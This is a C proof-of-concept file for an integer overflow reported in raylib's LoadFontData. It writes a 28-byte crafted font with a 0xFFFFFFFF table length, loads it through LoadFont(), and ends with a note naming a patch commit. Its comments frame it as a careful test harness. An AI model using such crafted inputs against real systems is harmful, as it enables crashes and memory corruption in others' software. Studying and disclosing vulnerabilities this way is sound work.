// CVE-2025-15534 PoC - Integer Overflow in raylib LoadFontData
// It writes a crafted font file to disk and loads it with LoadFont() to exercise the overflow.
#include "raylib.h"
#include <stdio.h>
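/**
 * Write the crafted font fixture used by this PoC to `filename`.
 *
 * The output is 28 bytes: a 12-byte sfnt header that declares one table,
 * followed by one 16-byte table-directory record whose length field is
 * 0xFFFFFFFF.
 *
 * NOTE(review): this is a stub, not a complete font. Nothing here shows that a
 * given raylib build parses far enough to reach the size computation, so
 * confirm the result with a sanitizer build rather than assuming it.
 *
 * Errors are reported on stderr. A partially written file is removed so that a
 * later load never sees a truncated fixture and produces a misleading result.
 *
 * @param filename  Path of the file to create; an existing file is overwritten.
 */
void create_malicious_font(const char* filename) {
    /* sfnt header, fields as laid out in the file */
    static const unsigned char header[] = {
        0x00, 0x01, 0x00, 0x00, /* sfnt version */
        0x00, 0x01,             /* numTables */
        0x00, 0x10,             /* searchRange */
        0x00, 0x00,             /* entrySelector */
        0x00, 0x00,             /* rangeShift */
    };
    /* Single table-directory record */
    static const unsigned char table_dir[] = {
        0x00, 0x00, 0x00, 0x00, /* tag */
        0x00, 0x00, 0x00, 0x00, /* checksum */
        0x00, 0x00, 0x00, 0x00, /* offset */
        /* 0xFFFFFFFF is UINT32_MAX for an unsigned 32-bit field, and -1 if the
           reader stores it in a signed int; it is not INT_MAX (0x7FFFFFFF). */
        0xFF, 0xFF, 0xFF, 0xFF, /* length */
    };

    if (filename == NULL) {
        fprintf(stderr, "create_malicious_font: no output path given\n");
        return;
    }

    FILE *fp = fopen(filename, "wb");
    if (fp == NULL) {
        perror("create_malicious_font: fopen");
        return;
    }

    /* fwrite may write fewer bytes than requested; treat a short write as failure. */
    int ok = fwrite(header, 1, sizeof header, fp) == sizeof header &&
             fwrite(table_dir, 1, sizeof table_dir, fp) == sizeof table_dir;

    /* fclose flushes buffered data, so its result decides whether the bytes landed. */
    if (fclose(fp) != 0) {
        ok = 0;
    }

    if (!ok) {
        fprintf(stderr, "create_malicious_font: could not write %s completely\n", filename);
        remove(filename);
    }
}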
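/*
 * Harness: generate the crafted fixture, load it through raylib, then show a
 * window until it is closed.
 *
 * How to read a run: a crash or a sanitizer report (for example from a build
 * with -fsanitize=address,undefined) during LoadFont() is the signal. The
 * on-screen banner is static text and is drawn on every build. Reaching the
 * window loop only means this build did not fault on this fixture; it does
 * not prove the build is patched.
 */
int main(void) {
    const int screenWidth = 800;
    const int screenHeight = 450;
    const char *malicious_font = "malicious_font.ttf";

    InitWindow(screenWidth, screenHeight, "CVE-2025-15534 PoC");
    SetTargetFPS(60);

    // Write the crafted fixture into the current working directory.
    create_malicious_font(malicious_font);

    // LoadFont() is the public entry point used here. According to this PoC's
    // author, the fixture is then processed by LoadFontData, where the buffer
    // size calculation overflows.
    Font font = LoadFont(malicious_font);

    // The fixture is only needed for the load above. Delete it so a crafted
    // font is not left on disk where another tool could pick it up.
    remove(malicious_font);

    while (!WindowShouldClose()) {
        BeginDrawing();
        ClearBackground(RAYWHITE);
        DrawText("CVE-2025-15534 Integer Overflow PoC", 10, 10, 20, RED);
        DrawText("Vulnerable: raylib LoadFontData function", 10, 40, 20, DARKGRAY);
        EndDrawing();
    }

    UnloadFont(font);
    CloseWindow();
    return 0;
}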
// Mitigation: apply the patch from commit 5a3391fdce046bc5473e52afbd835dd2dc127146,
// or upgrade to a raylib version that includes it. Until then, do not load
// fonts from untrusted sources.